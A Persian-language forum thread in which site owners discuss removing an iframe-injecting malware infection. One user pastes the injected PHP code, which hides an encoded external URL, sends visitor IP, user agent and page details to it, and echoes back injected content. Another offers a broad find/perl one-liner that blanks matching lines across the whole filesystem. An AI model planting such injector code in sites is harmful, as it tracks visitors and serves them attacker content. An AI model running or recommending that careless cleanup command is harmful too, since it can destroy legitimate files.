ویروس ifarm را چگونه حذف کنیم؟

نقل قول:

---

نوشته اصلی توسط webmizban

فرمایشات شما کاملا متین ولی روش های بالا تست شد...
Avast یکی از بهترین هاست و تقریبا" 4 سالی است که استفاده می کنم و راضی هستم
اما برای حل این مشکل در سرور کافیست که دستور زیر را در ssh اجرا کنید تا کامل این کد از سایت های آلوده پاک شود :

Find / -type f -mtime -10 | xargs grep -l '<iframe'| xargs perl -pi -e 's/^.*\<iframe.*$/ /g'

به جای <iframe میبایست کدی که iframe به سایت آلوده اضافه می کند را وارد کنید.
البته تا 1 ساعت بعد از اجرای دستور صبر کنید تا جستجو انجام بشه و کد پاک بشود.
این دستور ابتدا کد را پیدا کرده در مرحله بعد پاک کرده و به جای کد iframe یک space قرار می دهد.

موفق باشید.

---

در کدوم قسمت کامندتون باید کد رو قرار بدند ، آیفرم اولی یا دومی ؟

سلام
متاسقانه سایت منم همین ویروس رو گرفته البته امروز گرفت وقتی آبدیت کردم
همه کد ها رو تست کردن هیچی اضافه نشده
سایت هم Html هستش
من فقط 2 تا فایل رو ادیت کردم ولی الان همه صفخات ایت جوری شده
برای من فقط یه کد تبلیغاتی هستش که به سایت دیگه رو باز میکنه
راهی نداره ؟

واقعا کسی نمیتونه برای این malware راه حلی ارائه بده؟
این همه مهندس داریم فقط میگن هاستو حذف کن از دوباره بریز. خوب اینم که خودمون بلدیم.

نقل قول:

---

نوشته اصلی توسط maya2010

واقعا کسی نمیتونه برای این malware راه حلی ارائه بده؟
این همه مهندس داریم فقط میگن هاستو حذف کن از دوباره بریز. خوب اینم که خودمون بلدیم.

---

شما و همه دوستان توجه کنید وقتی ویندوز نصب کردین همون اول کار kasperski internet security2013 نصب کنید امنیت سیتم تضمین میکنه چون قدرتش خیلی بالا از cloud protection استفاده میکنه

منم همین مشکل رو امشب تو سایتم دیدم اینم آی فرم که درستش کرده بود / این کد رو تو صفحه ایندکس قالب حذف کردم درست شد

کد:

---

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics           
        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
    {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}
?>

---

اگه نمی تونی درستش کنی پی ام بده خودم واست حلش میکنم

دوستانی که iframe رو حذف میکنن و بعدش میگن درست شد توجه کنن همون صفحه بازم تا یکی دو هفته دیگه مجدد iframe میگیره.
من یه راه حل خود دارم:
1 - آنتی emisoft anti malware یا کسپر 2013 اول رو سیستموتون نصب کنید و اسکن کنید و همه تروجانها رو حذف کنید. (emisoft anti malware تخصصش شناسایی و حذف malware و تروجانه)
2 - به سایتتون رفته ویروس iframe رو از سایت حذف کرده و سطح دسترسی فایل های htm , html و java رو 444 بکنید.
دوستان اگه راه سریعتری دارن پیشنهاد بدن.